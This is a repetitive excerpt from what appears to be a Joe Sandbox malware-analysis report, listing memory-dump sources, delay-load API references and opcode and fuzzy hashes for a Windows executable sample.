                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 3984ad37a0098bef13cd6de3b4cf1183b9f038491873a6da4156d073356fc623
                        • Instruction ID: 4157f35120069220ee23148580ff8b4d5b7b3df5fafcc44b617ccadb68ab236e
                        • Opcode Fuzzy Hash: 3984ad37a0098bef13cd6de3b4cf1183b9f038491873a6da4156d073356fc623
                        • Instruction Fuzzy Hash: 3BB012DA25C101BD710871451D47D36118CC2D4F10334461EF014D4081D7404D4106B5
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B796
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: d4b7626c7973e163cd28b2f91cdb151c2cf38afe2a7210498e8607553cabb378
                        • Instruction ID: 31c3a590131c588b468401b20ff2120601959816cebf8f32687b0e6e65365d08
                        • Opcode Fuzzy Hash: d4b7626c7973e163cd28b2f91cdb151c2cf38afe2a7210498e8607553cabb378
                        • Instruction Fuzzy Hash: ADB012D925C101BD710871461E47D3611CCC2D4F10334451EF014D4481D7404E4106B5
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B796
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 5661705e9ae54ae58882a1e28d3e329bcf9315783e9480ef0bbcf98e551a199a
                        • Instruction ID: 2dbfce2f833456b5cddf9a3d8d47ee081587f44988be9cd5d7c9382f56c2b873
                        • Opcode Fuzzy Hash: 5661705e9ae54ae58882a1e28d3e329bcf9315783e9480ef0bbcf98e551a199a
                        • Instruction Fuzzy Hash: 2BB012CA25C201BD714871451D47D36118CC2D4F10334461EF014D4081D7404D8006B5
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B796
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 8775760efd954c7279b792cd0c8392ef448e7e47d756ab69110bd3f6b8d1242c
                        • Instruction ID: 585b3efe459df6552e4bd0dd1bc0ba427ee19c26b78036776ced7d04e6b4b6e2
                        • Opcode Fuzzy Hash: 8775760efd954c7279b792cd0c8392ef448e7e47d756ab69110bd3f6b8d1242c
                        • Instruction Fuzzy Hash: 58B0128525C101BD711871851D47D36114CC2D4F10334491EF014D40C1D7404D4116B5
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B796
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: d80e3f5245ea4bf0af7890d13e71d6e87705c4b9ede78e1517bf00d1a3046903
                        • Instruction ID: c2b1f6f7c4557bb64825c91745bd44c5ffa727ec69af3dcb2fcf2f9885086734
                        • Opcode Fuzzy Hash: d80e3f5245ea4bf0af7890d13e71d6e87705c4b9ede78e1517bf00d1a3046903
                        • Instruction Fuzzy Hash: A2B0128525C101BD711871865E47D36114CC2D4F10334451EF015D4481D7404E4106B5
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B796
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 8854c4f3e319c354c9860a871745aad5a21044794ef6ba59bbc8e92d7f44bc9a
                        • Instruction ID: c7ed7a005c167e44ae934e884df0a0d2a880b1d7d184f0f65b9c9460e09253ab
                        • Opcode Fuzzy Hash: 8854c4f3e319c354c9860a871745aad5a21044794ef6ba59bbc8e92d7f44bc9a
                        • Instruction Fuzzy Hash: 64B0128525C101BD711871851D57D36114CC2D5F10334851EF414E4081D7404D4006B5
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B796
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 986dfe443988b7c0efa3161792b741ac4077edcbd248bec50de90047a6117b57
                        • Instruction ID: 6f1237875e79167ae665346495b52d5d746b0e9e2a96af6fdbcf368ccebb4040
                        • Opcode Fuzzy Hash: 986dfe443988b7c0efa3161792b741ac4077edcbd248bec50de90047a6117b57
                        • Instruction Fuzzy Hash: 7AB0128535C201BD714871455D47D36114CC2D4F10334461EF054D4081DB404D8006B5
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B796
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 582ea3e28cc920de5b8099ef8cc458faedcf930821f95da2e68395ed0047ce7d
                        • Instruction ID: 5e831b377b1e5770316a20828b58a5d88a79febe741f4bfd4c620b6377574d83
                        • Opcode Fuzzy Hash: 582ea3e28cc920de5b8099ef8cc458faedcf930821f95da2e68395ed0047ce7d
                        • Instruction Fuzzy Hash: 60B0128535C101BD710871451D57D36125CC2D5F10334851EF414D4081D7404D400BB6
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B9B9
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 0a7d06e7c8c2e964b4bf75bd4a98cc80bb7467321a86a517b78f2c175bf50052
                        • Instruction ID: 949a1a73985f0068ceccd4b8dcdff39201fef833f7589b86a4112974c282faff
                        • Opcode Fuzzy Hash: 0a7d06e7c8c2e964b4bf75bd4a98cc80bb7467321a86a517b78f2c175bf50052
                        • Instruction Fuzzy Hash: 91B012C976C110BE710871441D46E3B010CC2E1B18370852EF205C4040E7406D450BB1
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B9B9
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 7777e18a052b3cd59990fd89717aa4ad5da170b105e594642c45d85d95bb99bf
                        • Instruction ID: 17a4eee10075a77e666b95b0b296816362c28998ea21e104226f661924331c4a
                        • Opcode Fuzzy Hash: 7777e18a052b3cd59990fd89717aa4ad5da170b105e594642c45d85d95bb99bf
                        • Instruction Fuzzy Hash: 62B012DAB6C110FD7108B1481D46D37010CC2D1B14370812EF504C4040E7406E400B71
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B9B9
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 49b70fe710ded7a782d64d6ea7830a11f267c8e55aa92596a6c0717da425f1cc
                        • Instruction ID: eeda242664828073c0013efe6d9d7ead798cc4eabab19b336c9579dab99742d5
                        • Opcode Fuzzy Hash: 49b70fe710ded7a782d64d6ea7830a11f267c8e55aa92596a6c0717da425f1cc
                        • Instruction Fuzzy Hash: A7B012D976C110BD7108B1881E46D37010CC2D1B14370812EF204C4440E7416E410B71
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018BAA3
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: ee3c827c43f44f7ff29125567936b3220eabb30bbad34365f5e11d3cd448c4d1
                        • Instruction ID: 386ac8e59d6097c1c6cdd4f51a8840ce2de5f65561b2133145c11738f77e7dc3
                        • Opcode Fuzzy Hash: ee3c827c43f44f7ff29125567936b3220eabb30bbad34365f5e11d3cd448c4d1
                        • Instruction Fuzzy Hash: C6B012CD76C101FD720C71545D42C36021CC2E6B10371C61EF414D4040D7406D002AB1
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018BAA3
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: df865b3fd5b13f8ec1bfdc0513e90271ba473c90b2a0b8de97e573c9e808c306
                        • Instruction ID: 7341fe765151109715ea505d1f52b05cc74ddfbc5a559ba0fd845722ccaece31
                        • Opcode Fuzzy Hash: df865b3fd5b13f8ec1bfdc0513e90271ba473c90b2a0b8de97e573c9e808c306
                        • Instruction Fuzzy Hash: 1FB012CD36C401BD720C71985E42D36011CC2E6B103B0C31EF114C5440D7406D012FB1
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018BAA3
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: b5d3e95665e90ea28f7767f8b26d725df7cd7f5cd4a610b69cf50245be60afe7
                        • Instruction ID: 92295ee8148487fd21f606800af4e1de381feae47d0592d9c78d38610596bded
                        • Opcode Fuzzy Hash: b5d3e95665e90ea28f7767f8b26d725df7cd7f5cd4a610b69cf50245be60afe7
                        • Instruction Fuzzy Hash: 0CB012CD36C201BD770C71581D82D36012CC2E5F10370831EF414C5040D7406D442BB1
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018BAA3
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 763dbf72cf1c7a7ab41167ebd9085c57094482f17dbf684a7c074c555ae47a40
                        • Instruction ID: ea38b78fdf318cd265a0da8e00eed3f550c8b2d6fe2101e71b2a54fe05683868
                        • Opcode Fuzzy Hash: 763dbf72cf1c7a7ab41167ebd9085c57094482f17dbf684a7c074c555ae47a40
                        • Instruction Fuzzy Hash: 2AB012CD76C101FD720C71581D82D36011CC2E5F10370C11EF814C5040D7406D002AB1
                        APIs
                        • SetCurrentDirectoryW.KERNELBASE(?), ref: 0017666B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: CurrentDirectory
                        • String ID:
                        • API String ID: 1611563598-0
                        • Opcode ID: 3450bdbeeef28ffaed1790282f1996386b1fad01076b79862993b8c3547598d6
                        • Instruction ID: 0d61659a341b357be2397a158c0485b0b96e053a78fbf0f4b3c3c88984597fd0
                        • Opcode Fuzzy Hash: 3450bdbeeef28ffaed1790282f1996386b1fad01076b79862993b8c3547598d6
                        • Instruction Fuzzy Hash: B0C04870205200DFC704CF69EA9CE0A77AABF92B06B42C468F004CB520C734DCA0DA25
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B796
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 751acaf4e5a04d47de822f092e7cf9acefafa11dfb75e930b3da4455a407d8a2
                        • Instruction ID: fc79c657aaf4b27c6cf97219fe6d9f3a41c0907a2554a82828b42d747c51a9a9
